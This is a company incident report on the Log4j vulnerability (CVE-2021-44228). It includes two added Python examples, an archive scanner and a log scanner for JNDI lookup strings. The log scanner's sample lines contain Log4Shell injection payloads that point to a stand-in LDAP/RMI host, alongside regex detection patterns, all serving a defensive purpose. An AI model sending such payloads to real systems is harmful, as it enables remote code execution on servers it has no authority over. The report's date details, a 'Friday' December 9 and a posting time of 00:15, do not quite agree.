Files.com Response to the Log4j Vulnerability
Incident Report for Files.com
Resolved
The Apache Log4j utility is a widely used free and open source software package for Java used for logging. On December 9, 2021, a serious vulnerability was announced (CVE-2021-44228) revealing that certain versions of Apache Log4j could be remotely compromised, allowing an unauthenticated attacker to execute arbitrary code.

The security of our customers and their files is a top priority at Files.com.

Using the procedures in our Information Security Policy, we immediately reviewed our Software Inventory and list of Open Source Software to determine which components use Java. We then investigated to determine which such software may use Log4j, and prioritized our response based on impact.
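The inventory step above (find the Java components, then find which of those bundle Log4j) can be mechanised. The following is an added example written for this page, not Files.com's own tooling: it walks a directory tree, opens every Java archive, and reports those that still ship the `JndiLookup` class, looking one level into fat jars and `.war`/`.ear` bundles. Assumed, not from the notice: that the class path `org/apache/logging/log4j/core/lookup/JndiLookup.class` marks a log4j-core build with the JNDI lookup present, and that the jar manifest carries an `Implementation-Version` header for the version string. The fixture jars it builds are constructed for the demo.

```python
"""Added example (not Files.com's tooling): inventory a directory tree for
Java archives that bundle a log4j-core with the JNDI lookup class present.

Assumptions (not from the Files.com notice):
  - org/apache/logging/log4j/core/lookup/JndiLookup.class inside an archive
    marks a log4j-core build that still ships the JNDI lookup;
  - META-INF/MANIFEST.MF carries an Implementation-Version header (log4j-core
    does), used to report the bundled version;
  - nested archives (fat jars, .war/.ear) are inspected one level deep.
"""
import io
import os
import tempfile
import zipfile

JNDI_LOOKUP_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
ARCHIVE_SUFFIXES = (".jar", ".war", ".ear", ".zip")


def _manifest_version(zf):
    """Return Implementation-Version from the archive manifest, or None."""
    try:
        manifest = zf.read("META-INF/MANIFEST.MF").decode("utf-8", "replace")
    except KeyError:
        return None
    for line in manifest.splitlines():
        if line.startswith("Implementation-Version:"):
            return line.split(":", 1)[1].strip()
    return None


def _inspect_archive(zf, label, depth, findings):
    """Record `label` if this archive (or a nested one) contains JndiLookup."""
    names = zf.namelist()
    if JNDI_LOOKUP_CLASS in names:
        findings.append({"archive": label, "version": _manifest_version(zf)})
    if depth == 0:
        return
    for name in names:
        if name.lower().endswith(ARCHIVE_SUFFIXES):
            try:
                inner = zipfile.ZipFile(io.BytesIO(zf.read(name)))
            except zipfile.BadZipFile:
                continue  # not a real archive; skip rather than abort the scan
            with inner:
                _inspect_archive(inner, f"{label}!{name}", depth - 1, findings)


def scan_tree(root, nested_depth=1):
    """Walk `root` and return a list of archives that bundle JndiLookup."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for fname in files:
            if not fname.lower().endswith(ARCHIVE_SUFFIXES):
                continue
            path = os.path.join(dirpath, fname)
            if not zipfile.is_zipfile(path):
                continue
            with zipfile.ZipFile(path) as zf:
                _inspect_archive(zf, path, nested_depth, findings)
    return findings


def build_demo():
    """Constructed fixture: one fat jar embedding a vulnerable log4j-core, one clean jar."""
    root = tempfile.mkdtemp(prefix="log4j-inventory-")
    placeholder_class = b"\xca\xfe\xba\xbe"  # class-file magic only; constructed
    core = io.BytesIO()
    with zipfile.ZipFile(core, "w") as zf:
        zf.writestr("META-INF/MANIFEST.MF",
                    "Manifest-Version: 1.0\nImplementation-Version: 2.14.1\n")
        zf.writestr(JNDI_LOOKUP_CLASS, placeholder_class)
    with zipfile.ZipFile(os.path.join(root, "app-fat.jar"), "w") as zf:
        zf.writestr("com/example/Main.class", placeholder_class)
        zf.writestr("BOOT-INF/lib/log4j-core-2.14.1.jar", core.getvalue())
    with zipfile.ZipFile(os.path.join(root, "util.jar"), "w") as zf:
        zf.writestr("com/example/Util.class", placeholder_class)
    return root


if __name__ == "__main__":
    for hit in scan_tree(build_demo()):
        print(f"{hit['archive']}: log4j-core {hit['version']} ships JndiLookup")
```

Run it against a real deployment root instead of `build_demo()` to get the list of archives to prioritise; the version string tells you whether an upgrade or a class removal is the right fix for that component.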

The most notable component impacted was our “files-protocol-server” internal service, which provides FTP, SFTP, WebDAV, ZIP, and public hosting services for Files.com. We deployed full fixes to this service during the business day on Friday December 9.

Another impacted item was Elasticsearch, and its associated utilities such as Kibana and Logstash. We use Elasticsearch in many different capacities at Files.com, both for customer-facing searches as well as internal compliance use. Based on our initial research, the vulnerability did not seem to be exploitable against our Elasticsearch instances, but all Elasticsearch instances have been updated across our infrastructure anyway.

Nexus, another Java utility used by Files.com for critical components, was determined not to use Log4j.

We searched our logs for signatures of the offending log strings and did not find any. There is no evidence of compromise at this time, and we are continuing to actively monitor the issue. No further action is needed by customers to continue using Files.com.
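The log search mentioned above looks for the lookup string that triggers CVE-2021-44228 in any logged field (request paths, User-Agent headers, usernames). The following is an added example written for this page, not Files.com's own detection: it scans log lines for the `${jndi:<scheme>:...}` lookup and, separately, flags any lookup nested inside another lookup for analyst review. Assumptions, not from the notice: that the direct signature is the `${jndi:` prefix, that a nested `${...}` inside a lookup is worth a second look even without the literal token, and that the sample lines are constructed (the addresses are from documentation ranges).

```python
"""Added example (not Files.com's tooling): scan log lines for the Log4j
lookup signature associated with CVE-2021-44228 and report what was seen.

Assumptions (not from the Files.com notice):
  - the direct trigger is a `${jndi:<scheme>:...}` lookup in a logged field;
  - a `${...}` lookup nested inside another lookup is flagged for review even
    when the literal `jndi:` token is absent;
  - SAMPLE_LOG is constructed for the demo, not real traffic.
"""
import re

# Direct form, case-insensitive, capturing the scheme (ldap, rmi, dns, ...).
JNDI_RE = re.compile(r"\$\{\s*jndi\s*:\s*([a-z0-9+.-]+)\s*:", re.IGNORECASE)
# Any lookup whose body opens another lookup before the first closing brace.
NESTED_RE = re.compile(r"\$\{[^}]*\$\{")


def classify_line(line):
    """Return ('jndi', scheme), ('nested-lookup', None), or None."""
    m = JNDI_RE.search(line)
    if m:
        return ("jndi", m.group(1).lower())
    if NESTED_RE.search(line):
        return ("nested-lookup", None)
    return None


def scan_log(lines):
    """Return (line_no, category, scheme, line) for every line that matches."""
    hits = []
    for n, line in enumerate(lines, 1):
        verdict = classify_line(line)
        if verdict:
            hits.append((n, verdict[0], verdict[1], line.rstrip("\n")))
    return hits


# Constructed sample lines mixing web-access and SFTP-auth formats.
SAMPLE_LOG = [
    '10.0.0.5 - - [09/Dec/2021:10:15:01 -0800] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [09/Dec/2021:10:15:07 -0800] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://203.0.113.7:1389/a}"',
    '10.0.0.9 - - [09/Dec/2021:10:15:09 -0800] "GET /login HTTP/1.1" 302 0 "-" "${JNDI:RMI://203.0.113.7:1099/b}"',
    'sftp auth failure user="${a:${b}}" from 10.0.0.12',
    'sftp auth ok user="alice" from 10.0.0.13',
    'INFO config jndi.enabled=false',  # mentions jndi but is not a lookup
]


if __name__ == "__main__":
    for n, category, scheme, line in scan_log(SAMPLE_LOG):
        detail = f" scheme={scheme}" if scheme else ""
        print(f"line {n}: {category}{detail}: {line}")
```

The last sample line shows why the pattern anchors on the `${` lookup syntax rather than on the bare word: a configuration message that merely mentions JNDI should not page anyone. Reading the log from a file instead of `SAMPLE_LOG` is a matter of passing the open file handle to `scan_log`.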

One of the numerous layers of security Files.com has in place is a 24/7 Bug Bounty Program. Through this bounty program, Files.com invites and incentivizes members of the security research community to continuously test our systems. There have not been any reports in our Bug Bounty Program related to CVE-2021-44228.

If you have any further questions or concerns, please let us know how we can assist you. You can contact us by email, chat (in your web interface when logged in), or phone (1-800-286-8372 ext. 2).
Posted Dec 09, 2021 - 00:15 PST